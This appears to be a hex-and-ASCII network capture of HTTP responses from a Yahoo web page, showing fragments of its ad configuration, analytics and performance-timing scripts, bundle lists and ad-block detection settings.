                                                                                                                                                                        2023-06-02 11:13:21 UTC827INData Raw: 65 77 65 72 47 65 6d 69 6e 69 53 4d 41 64 45 6e 61 62 6c 65 64 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 65 77 65 72 50 6f 73 69 74 69 6f 6e 4d 65 74 61 3a 20 7b 22 66 6f 72 63 65 4c 72 65 63 32 22 3a 66 61 6c 73 65 2c 22 70 6f 73 69 74 69 6f 6e 73 22 3a 5b 7b 22 63 6c 65 61 6e 22 3a 22 76 69 65 77 65 72 2d 49 4e 41 52 54 49 43 4c 45 22 2c 22 64 65 73 74 22 3a 22 64 65 66 61 75 6c 74 49 4e 41 52 54 49 43 4c 45 22 2c 22 66 64 62 22 3a 31 2c 22 66 6c 65 78 22 3a 7b 22 68 22 3a 7b 22 6d 69 6e 22 3a 31 30 7d 2c 22 72 61 74 69 6f 22 3a 22 31 2e 37 38 78 31 22 2c 22 77 22 3a 7b 22 6d 69 6e 22 3a 31 30 7d 7d 2c 22 68 22 3a 32 31 31 2c 22 69 64 22 3a 22 49 4e 41 52 54 49 43 4c 45 2d 31 22 2c 22 73 75 70 70 6f 72 74 73 22 3a 7b 22 65 78
                                                                                                                                                                        Data Ascii: ewerGeminiSMAdEnabled: false, viewerPositionMeta: {"forceLrec2":false,"positions":[{"clean":"viewer-INARTICLE","dest":"defaultINARTICLE","fdb":1,"flex":{"h":{"min":10},"ratio":"1.78x1","w":{"min":10}},"h":211,"id":"INARTICLE-1","supports":{"ex
                                                                                                                                                                        2023-06-02 11:13:21 UTC828INData Raw: 27 20 4c 52 45 43 32 3d 27 33 30 30 78 32 35 30 3b 31 78 31 27 20 4c 52 45 43 33 3d 27 33 30 30 78 32 35 30 3b 31 78 31 27 20 55 42 41 4c 52 45 43 3d 27 33 30 30 78 32 35 30 3b 31 78 31 27 20 55 42 41 4c 52 45 43 32 3d 27 33 30 30 78 32 35 30 3b 31 78 31 27 20 55 42 41 4c 52 45 43 33 3d 27 33 30 30 78 32 35 30 3b 31 78 31 27 20 4d 4f 4e 3d 27 33 30 30 78 36 30 30 3b 31 78 31 27 20 63 74 6f 75 74 3d 33 38 30 22 2c 22 73 6c 69 64 65 73 68 6f 77 50 6f 73 69 74 69 6f 6e 73 22 3a 5b 22 4c 52 45 43 2d 31 22 5d 2c 22 67 72 6f 75 70 52 6f 74 61 74 69 6f 6e 22 3a 7b 22 4d 4f 4e 32 2d 31 22 3a 22 4c 52 45 43 33 2d 31 22 7d 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 65 77 65 72 52 65 73 65 74 41 75 74 6f 45 76 65 6e 74 4f 6e 43 6c 6f 73 65 3a 20 74 72 75 65
                                                                                                                                                                        Data Ascii: ' LREC2='300x250;1x1' LREC3='300x250;1x1' UBALREC='300x250;1x1' UBALREC2='300x250;1x1' UBALREC3='300x250;1x1' MON='300x600;1x1' ctout=380","slideshowPositions":["LREC-1"],"groupRotation":{"MON2-1":"LREC3-1"}}, viewerResetAutoEventOnClose: true
                                                                                                                                                                        2023-06-02 11:13:21 UTC830INData Raw: 35 2c 22 6e 74 6b 43 6c 75 73 74 65 72 53 69 7a 65 22 3a 35 7d 2c 22 63 6c 75 73 74 65 72 41 72 74 69 63 6c 65 52 61 70 69 64 43 6f 6e 66 69 67 22 3a 7b 22 70 6c 32 22 3a 22 73 65 61 6d 6c 65 73 73 2d 61 72 74 69 63 6c 65 22 7d 2c 22 6d 61 69 6e 41 72 74 69 63 6c 65 52 61 70 69 64 43 6f 6e 66 69 67 22 3a 7b 22 70 6c 32 22 3a 22 73 65 61 6d 6c 65 73 73 2d 61 72 74 69 63 6c 65 22 7d 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 77 61 66 65 72 52 65 61 64 79 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 61 66 65 72 52 65 61 64 79 28 69 6e 69 74 56 69 65 77 65 72 29 3b 0a 20 20 20 20 20
                                                                                                                                                                        Data Ascii: 5,"ntkClusterSize":5},"clusterArticleRapidConfig":{"pl2":"seamless-article"},"mainArticleRapidConfig":{"pl2":"seamless-article"}}); } } if (waferReady) { waferReady(initViewer);
                                                                                                                                                                        2023-06-02 11:13:21 UTC831INData Raw: 6f 6e 66 69 67 20 6e 6f 6e 63 65 3d 62 33 30 32 35 39 30 33 66 38 34 66 38 64 66 32 33 37 30 63 32 39 38 36 63 33 32 31 36 32 34 63 37 39 66 33 66 38 39 39 32 32 61 34 62 31 30 39 61 30 39 63 64 63 63 39 64 62 66 32 33 31 31 33 3e 0a 20 20 20 20 20 20 20 20 7b 22 63 6f 6e 66 69 67 22 3a 7b 22 63 6f 6e 76 65 72 73 61 74 69 6f 6e 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 6a 61 63 44 6f 6d 61 69 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 6f 70 65 6e 77 65 62 2e 6a 61 63 2e 79 61 68 6f 6f 73 61 6e 64 62 6f 78 2e 63 6f 6d 22 2c 22 6a 61 63 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6f 70 65 6e 77 65 62 2e 6a 61 63 2e 79 61 68 6f 6f 73 61 6e 64 62 6f 78 2e 63 6f 6d 2f 31 2e 35 2e 30 2f 6a 61 63 2e 6a 73 22 2c 22 6c 61 75 6e 63 68 65 72 55 72 6c 22 3a 22 68 74 74 70
                                                                                                                                                                        Data Ascii: onfig nonce=b3025903f84f8df2370c2986c321624c79f3f89922a4b109a09cdcc9dbf23113> {"config":{"conversationEnabled":true,"jacDomain":"https://openweb.jac.yahoosandbox.com","jacUrl":"https://openweb.jac.yahoosandbox.com/1.5.0/jac.js","launcherUrl":"http
                                                                                                                                                                        2023-06-02 11:13:21 UTC832INData Raw: 74 22 2c 0a 20 20 20 20 20 20 20 20 22 65 6e 61 62 6c 65 46 69 6e 61 6e 63 65 50 72 65 6d 69 75 6d 54 69 63 6b 65 72 22 2c 0a 20 20 20 20 20 20 20 20 22 65 6e 61 62 6c 65 4d 61 73 74 41 64 22 2c 0a 20 20 20 20 20 20 20 20 22 65 6e 61 62 6c 65 4e 61 74 69 76 65 42 69 6c 6c 62 6f 61 72 64 22 2c 0a 20 20 20 20 20 20 20 20 22 65 6e 61 62 6c 65 50 61 72 74 6e 65 72 43 6f 6f 6b 69 65 43 6c 65 61 6e 75 70 22 2c 0a 20 20 20 20 20 20 20 20 22 65 6e 61 62 6c 65 52 69 67 68 74 52 61 69 6c 52 65 66 72 65 73 68 22 2c 0a 20 20 20 20 20 20 20 20 22 65 6e 61 62 6c 65 53 65 61 6d 6c 65 73 73 43 6c 75 73 74 65 72 22 2c 0a 20 20 20 20 20 20 20 20 22 65 6e 61 62 6c 65 53 70 6f 74 49 6d 41 64 73 56 69 65 77 65 72 53 74 72 65 61 6d 22 2c 0a 20 20 20 20 20 20 20 20 22 65 6e 61
                                                                                                                                                                        Data Ascii: t", "enableFinancePremiumTicker", "enableMastAd", "enableNativeBillboard", "enablePartnerCookieCleanup", "enableRightRailRefresh", "enableSeamlessCluster", "enableSpotImAdsViewerStream", "ena
                                                                                                                                                                        2023-06-02 11:13:21 UTC833INData Raw: 70 2e 76 69 64 65 6f 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 6f 61 74 68 2f 6a 73 2f 31 2f 6f 61 74 68 2d 70 6c 61 79 65 72 2e 6a 73 3f 79 70 76 3d 38 2e 35 2e 34 33 26 6c 61 6e 67 3d 65 6e 2d 55 53 22 7d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 35 35 39 32 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 73 73 2f 72 61 70 69 64 2d 33 2e 35 33 2e 33 38 2e 6a 73 22 20 6e 6f 6e 63 65 3d 62 33 30 32 35 39 30 33 66 38 34 66 38 64 66 32 33 37 30 63 32 39 38 36 63 33 32 31 36 32 34 63 37 39 66 33 66 38 39 39 32 32 61 34 62 31 30 39 61 30 39 63 64 63 63 39 64 62 66 32 33 31 31 33 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 74 65
                                                                                                                                                                        Data Ascii: p.video.yahoo.com/oath/js/1/oath-player.js?ypv=8.5.43&lang=en-US"}</script>5592<script type="text/javascript" src="https://s.yimg.com/ss/rapid-3.53.38.js" nonce=b3025903f84f8df2370c2986c321624c79f3f89922a4b109a09cdcc9dbf23113></script><script type=te
                                                                                                                                                                        2023-06-02 11:13:21 UTC835INData Raw: 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 62 65 61 63 6f 6e 20 61 70 76 20 66 6f 72 20 6d 6f 62 69 6c 65 20 77 65 62 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 65 6e 61 62 6c 65 41 70 76 42 65 61 63 6f 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 61 70 69 64 43 6f 6e 66 69 67 2e 61 70 76 5f 63 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 70 76 4f 62 6a 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 27 32 30 32 33 35 33 38 30 37 35 27 20 3d 3d 3d 20 59 41 48 4f 4f 2e 69 31 33 6e 2e 53 50 41 43 45 49 44 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: } // beacon apv for mobile web if (enableApvBeacon) { rapidConfig.apv_callback = function(apvObj) { try { if ('2023538075' === YAHOO.i13n.SPACEID) {
                                                                                                                                                                        2023-06-02 11:13:21 UTC836INData Raw: 30 31 38 65 31 31 39 35 35 31 62 30 65 33 37 36 35 31 2e 63 73 73 22 3a 74 72 75 65 2c 22 2f 61 61 71 2f 63 70 72 6f 70 73 2f 63 6f 6c 6f 72 73 5f 31 2e 31 2e 32 37 2e 6d 69 6e 2e 63 73 73 22 3a 74 72 75 65 2c 22 2f 6f 73 2f 79 63 2f 63 73 73 2f 62 75 6e 64 6c 65 2e 63 36 30 61 36 64 35 34 2e 63 73 73 22 3a 74 72 75 65 2c 22 2f 61 61 71 2f 73 63 70 2f 63 73 73 2f 66 70 41 74 6f 6d 69 63 2e 61 74 6f 6d 69 63 2e 6c 74 72 2e 65 33 62 37 35 39 64 33 62 37 63 31 33 34 33 38 64 33 38 38 34 37 33 34 65 34 63 63 30 65 38 30 2e 63 73 73 22 3a 74 72 75 65 2c 22 2f 61 61 71 2f 73 63 70 2f 63 73 73 2f 79 61 68 6f 6f 73 61 6e 73 2e 30 38 61 66 61 31 63 36 38 66 32 33 37 33 30 35 30 31 65 35 63 33 37 31 66 38 36 30 38 32 33 61 2e 63 73 73 22 3a 74 72 75 65 2c 22 2f 61
                                                                                                                                                                        Data Ascii: 018e119551b0e37651.css":true,"/aaq/cprops/colors_1.1.27.min.css":true,"/os/yc/css/bundle.c60a6d54.css":true,"/aaq/scp/css/fpAtomic.atomic.ltr.e3b759d3b7c13438d3884734e4cc0e80.css":true,"/aaq/scp/css/yahoosans.08afa1c68f23730501e5c371f860823a.css":true,"/a
                                                                                                                                                                        2023-06-02 11:13:21 UTC837INData Raw: 35 30 61 33 38 34 32 34 39 34 61 34 33 37 37 35 37 30 64 66 62 37 37 32 35 37 38 39 31 66 66 2e 6a 73 22 3a 74 72 75 65 2c 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 6f 67 67 6c 65 2d 31 2e 31 35 2e 34 2e 6a 73 22 3a 74 72 75 65 2c 22 2f 61 61 71 2f 66 70 2f 6a 73 2f 72 65 61 63 74 2d 77 61 66 65 72 2d 66 65 61 74 75 72 65 62 61 72 2e 63 75 73 74 6f 6d 2e 64 65 66 61 75 6c 74 2e 39 35 61 37 39 37 39 62 34 63 30 36 32 39 35 65 32 32 39 36 30 30 34 33 64 30 30 33 66 62 34 39 2e 6a 73 22 3a 74 72 75 65 2c 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 6f 6f 6c 74 69 70 2d 31 2e 32 2e 31 2e 6a 73 22 3a 74 72 75 65 2c 22 2f 61 61 71 2f 77 66 2f 77 66 2d 66 6f 72 6d 2d 31 2e 33 33 2e 31 2e 6a 73 22 3a 74 72 75 65 2c 22 2f 61 61 71 2f 77 66 2f 77 66 2d 61 75 74 6f 63 6f 6d
                                                                                                                                                                        Data Ascii: 50a3842494a4377570dfb77257891ff.js":true,"/aaq/wf/wf-toggle-1.15.4.js":true,"/aaq/fp/js/react-wafer-featurebar.custom.default.95a7979b4c06295e22960043d003fb49.js":true,"/aaq/wf/wf-tooltip-1.2.1.js":true,"/aaq/wf/wf-form-1.33.1.js":true,"/aaq/wf/wf-autocom
                                                                                                                                                                        2023-06-02 11:13:21 UTC837INData Raw: 6a 73 22 3a 74 72 75 65 2c 22 2f 61 61 71 2f 77 66 2f 77 66 2d 67 65 6f 6c 6f 63 61 74 69 6f 6e 2d 31 2e 33 2e 30 2e 6a 73 22 3a 74 72 75 65 2c 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6d 65 6e 75 2d 31 2e 31 2e 38 2e 6a 73 22 3a 74 72 75 65 2c 22 2f 61 61 71 2f 77 66 2f 77 66 2d 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 2d 31 2e 30 2e 32 2e 6a 73 22 3a 74 72 75 65 2c 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6d 6f 76 65 2d 31 2e 31 2e 31 2e 6a 73 22 3a 74 72 75 65 2c 22 2f 61 61 71 2f 77 66 2f 77 66 2d 66 65 74 63 68 2d 31 2e 31 38 2e 31 32 2e 6a 73 22 3a 74 72 75 65 2c 22 2f 61 61 71 2f 77 66 2f 77 66 2d 74 61 62 73 2d 31 2e 31 32 2e 36 2e 6a 73 22 3a 74 72 75 65 2c 22 2f 61 61 71 2f 77 66 2f 77 66 2d 6c 69 67 68 74 62 6f 78 2d 31 2e 31 30 2e 36 2e 6a 73 22 3a 74
                                                                                                                                                                        Data Ascii: js":true,"/aaq/wf/wf-geolocation-1.3.0.js":true,"/aaq/wf/wf-menu-1.1.8.js":true,"/aaq/wf/wf-clipboard-copy-1.0.2.js":true,"/aaq/wf/wf-move-1.1.1.js":true,"/aaq/wf/wf-fetch-1.18.12.js":true,"/aaq/wf/wf-tabs-1.12.6.js":true,"/aaq/wf/wf-lightbox-1.10.6.js":t
                                                                                                                                                                        2023-06-02 11:13:21 UTC839INData Raw: 29 3b 0a 20 20 20 20 7d 29 28 77 69 6e 64 6f 77 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 61 61 71 2f 77 66 2f 77 66 2d 63 6f 72 65 2d 31 2e 36 33 2e 30 2e 6a 73 22 20 6e 6f 6e 63 65 3d 22 62 33 30 32 35 39 30 33 66 38 34 66 38 64 66 32 33 37 30 63 32 39 38 36 63 33 32 31 36 32 34 63 37 39 66 33 66 38 39 39 32 32 61 34 62 31 30 39 61 30 39 63 64 63 63 39 64 62 66 32 33 31 31 33 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 62 33 30 32 35 39 30 33 66 38 34 66 38 64 66 32 33 37 30 63 32 39 38 36 63 33 32 31 36 32 34 63 37 39 66 33 66 38 39 39 32 32 61 34 62 31 30 39 61 30 39
                                                                                                                                                                        Data Ascii: ); })(window);</script><script type="text/javascript" src="https://s.yimg.com/aaq/wf/wf-core-1.63.0.js" nonce="b3025903f84f8df2370c2986c321624c79f3f89922a4b109a09cdcc9dbf23113"></script><script nonce=b3025903f84f8df2370c2986c321624c79f3f89922a4b109a09
                                                                                                                                                                        2023-06-02 11:13:21 UTC840INData Raw: 20 20 20 72 65 74 75 72 6e 20 28 62 6f 64 79 43 6c 61 73 73 65 73 2e 69 6e 64 65 78 4f 66 28 27 70 75 73 68 50 72 6f 6d 6f 56 69 73 69 62 6c 65 27 29 20 3d 3d 3d 20 2d 31 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 72 61 63 6b 65 72 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 73 74 61 6e 63 65 3a 20 77 2e 59 41 48 4f 4f 20 26 26 20 77 2e 59 41 48 4f 4f 2e 69 31 33 6e 20 26 26 20 77 2e 59 41 48 4f 4f 2e 69 31 33 6e 2e 72 61 70 69 64 49 6e 73 74 61 6e 63 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 63 6b 65 72 57 69 6e 64 6f 77 50 61 74 68 3a 20 27 72 61 70 69 64 49 6e 73 74 61 6e 63 65 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20
                                                                                                                                                                        Data Ascii: return (bodyClasses.indexOf('pushPromoVisible') === -1); }; var tracker = { instance: w.YAHOO && w.YAHOO.i13n && w.YAHOO.i13n.rapidInstance, trackerWindowPath: 'rapidInstance' };
                                                                                                                                                                        2023-06-02 11:13:21 UTC841INData Raw: 20 20 20 20 20 20 73 65 72 76 69 63 65 57 6f 72 6b 65 72 46 65 61 74 75 72 65 73 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 64 57 72 69 74 65 3a 20 66 75 6e 63 74 69 6f 6e 20 64 69 64 57 72 69 74 65 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 2e 68 70 43 6c 69 65 6e 74 49 6e 73 74 61 6e 63 65 2e 73 65 72 76 69 63 65 57 6f 72 6b 65 72 20 26 26 20 77 2e 68 70 43 6c 69 65 6e 74 49 6e 73 74 61 6e 63 65 2e 73 65 72 76 69 63 65 57 6f 72 6b 65 72 2e 72 65 67 69 73 74 65 72 28 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 20 28 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 73 65 72 76 69 63 65 20 77 6f 72 6b 65 72 20 72 65 67
                                                                                                                                                                        Data Ascii: serviceWorkerFeatures: { didWrite: function didWrite() { w.hpClientInstance.serviceWorker && w.hpClientInstance.serviceWorker.register().catch(function (){ // service worker reg
                                                                                                                                                                        2023-06-02 11:13:21 UTC842INData Raw: 37 30 63 32 39 38 36 63 33 32 31 36 32 34 63 37 39 66 33 66 38 39 39 32 32 61 34 62 31 30 39 61 30 39 63 64 63 63 39 64 62 66 32 33 31 31 33 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 62 33 30 32 35 39 30 33 66 38 34 66 38 64 66 32 33 37 30 63 32 39 38 36 63 33 32 31 36 32 34 63 37 39 66 33 66 38 39 39 32 32 61 34 62 31 30 39 61 30 39 63 64 63 63 39 64 62 66 32 33 31 31 33 3e 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 77 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 20 26 26 20 74 79 70 65 6f 66 20 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 20 26 26 20 77 2e 64 6f 63 75
                                                                                                                                                                        Data Ascii: 70c2986c321624c79f3f89922a4b109a09cdcc9dbf23113></script><script type=text/javascript nonce=b3025903f84f8df2370c2986c321624c79f3f89922a4b109a09cdcc9dbf23113> (function(w) { if (w.performance && typeof w.performance.now === 'function' && w.docu
                                                                                                                                                                        2023-06-02 11:13:21 UTC844INData Raw: 6d 65 20 61 73 20 74 68 65 20 61 64 20 6d 6f 64 75 6c 65 27 73 20 6c 6f 61 64 20 74 69 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 64 61 72 6c 61 41 64 54 69 6d 69 6e 67 73 20 3d 20 5b 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 61 64 54 69 6d 69 6e 67 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 61 66 74 32 53 74 61 72 74 52 65 6e 64 65 72 20 3d 20 77 2e 59 41 46 54 2e 41 46 54 32 2e 67 65 74 41 46 54 32 53 74 61 72 74 52 65 6e 64 65 72 28 29 20 2d 20 38 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 74 79 70 65 6f 66 20 77 2e 5f 61 64 4c 54 20 21 3d 3d 20 27 75 6e
                                                                                                                                                                        Data Ascii: me as the ad module's load time var darlaAdTimings = []; var adTiming; var aft2StartRender = w.YAFT.AFT2.getAFT2StartRender() - 800; if (typeof w._adLT !== 'un
                                                                                                                                                                        2023-06-02 11:13:21 UTC845INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 61 64 4f 62 6a 20 69 6e 20 64 61 72 6c 61 41 64 54 69 6d 69 6e 67 73 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 64 61 72 6c 61 41 64 54 69 6d 69 6e 67 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 61 64 4f 62 6a 29 20 26 26 20 77 68 69 74 65 4c 69 73 74 65 64 41 64 73 20 26 26 20 74 79
                                                                                                                                                                        Data Ascii: } } } for (var adObj in darlaAdTimings) { if (darlaAdTimings.hasOwnProperty(adObj) && whiteListedAds && ty
                                                                                                                                                                        2023-06-02 11:13:21 UTC846INData Raw: 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 65 74 50 61 67 65 50 65 72 66 44 61 74 61 46 6f 72 54 72 61 63 6b 4d 6f 64 75 6c 65 73 20 3d 20 66 75 6e 63 74 69 6f 6e 28 70 61 67 65 50 65 72 66 44 61 74 61 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 72 61 63 6b 4d 6f 64 75 6c 65 73 50 65 72 66 4d 61 72 6b 20 3d 20 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 28 27 6d 61 72 6b 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 74 72 61 63 6b 4d 6f 64 75 6c 65 73 50 65 72 66 4d 61 72 6b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: }; var setPagePerfDataForTrackModules = function(pagePerfData) { var trackModulesPerfMark = w.performance.getEntriesByType('mark'); if (trackModulesPerfMark) {
                                                                                                                                                                        2023-06-02 11:13:21 UTC848INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 79 61 66 74 43 6f 6e 66 69 67 2e 70 72 65 50 72 6f 63 65 73 73 20 3d 20 70 72 65 50 72 6f 63 65 73 73 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 2e 59 41 46 54 2e 69 6e 69 74 28 79 61 66 74 43 6f 6e 66 69 67 2c 20 66 75 6e 63 74 69 6f 6e 28 64 61 74 61 2c 20 65 72 72 6f 72 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 65 72 72 6f 72 20 26 26 20 77 2e 72 61 70 69 64 49 6e 73 74 61 6e 63 65 29 20 7b 0a
                                                                                                                                                                        Data Ascii: } } } yaftConfig.preProcess = preProcess; w.YAFT.init(yaftConfig, function(data, error) { if (!error && w.rapidInstance) {
                                                                                                                                                                        2023-06-02 11:13:21 UTC849INData Raw: 5d 5b 30 5d 5d 20 20 3d 20 5f 61 64 4c 54 5b 69 5d 5b 31 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 50 61 67 65 50 65 72 66 44 61 74 61 46 6f 72 54 72 61 63 6b 4d 6f 64 75 6c 65 73 28 70 61 67 65 50 65 72 66 44 61 74 61 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 54 72 61 63 6b 20 75 73 65 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 74 79 70 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6e 61 76 43 6f
                                                                                                                                                                        Data Ascii: ][0]] = _adLT[i][1]; } } setPagePerfDataForTrackModules(pagePerfData); // Track user connection type var navCo
                                                                                                                                                                        2023-06-02 11:13:21 UTC850INData Raw: 33 66 38 34 66 38 64 66 32 33 37 30 63 32 39 38 36 63 33 32 31 36 32 34 63 37 39 66 33 66 38 39 39 32 32 61 34 62 31 30 39 61 30 39 63 64 63 63 39 64 62 66 32 33 31 31 33 3e 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 77 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 61 62 43 6f 6e 66 69 67 20 3d 20 7b 22 65 6e 61 62 6c 65 44 65 74 65 63 74 69 6f 6e 22 3a 74 72 75 65 2c 22 63 6f 6f 6b 69 65 44 75 72 61 74 69 6f 6e 49 6e 44 61 79 73 22 3a 37 2c 22 64 65 74 65 63 74 69 6f 6e 54 69 6d 65 6f 75 74 22 3a 33 30 30 2c 22 65 6e 61 62 6c 65 41 42 50 44 65 74 65 63 74 69 6f 6e 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 55 42 44 65 74 65 63 74 69 6f 6e 22 3a 74 72 75 65 2c 22 70 6f 73 69 74 69 6f 6e 73 22 3a 5b 22 73 64 61 2d 4c 44 52 42 22 2c 22 73 64 61 2d 4d
                                                                                                                                                                        Data Ascii: 3f84f8df2370c2986c321624c79f3f89922a4b109a09cdcc9dbf23113> (function(w) { var dabConfig = {"enableDetection":true,"cookieDurationInDays":7,"detectionTimeout":300,"enableABPDetection":true,"enableUBDetection":true,"positions":["sda-LDRB","sda-M
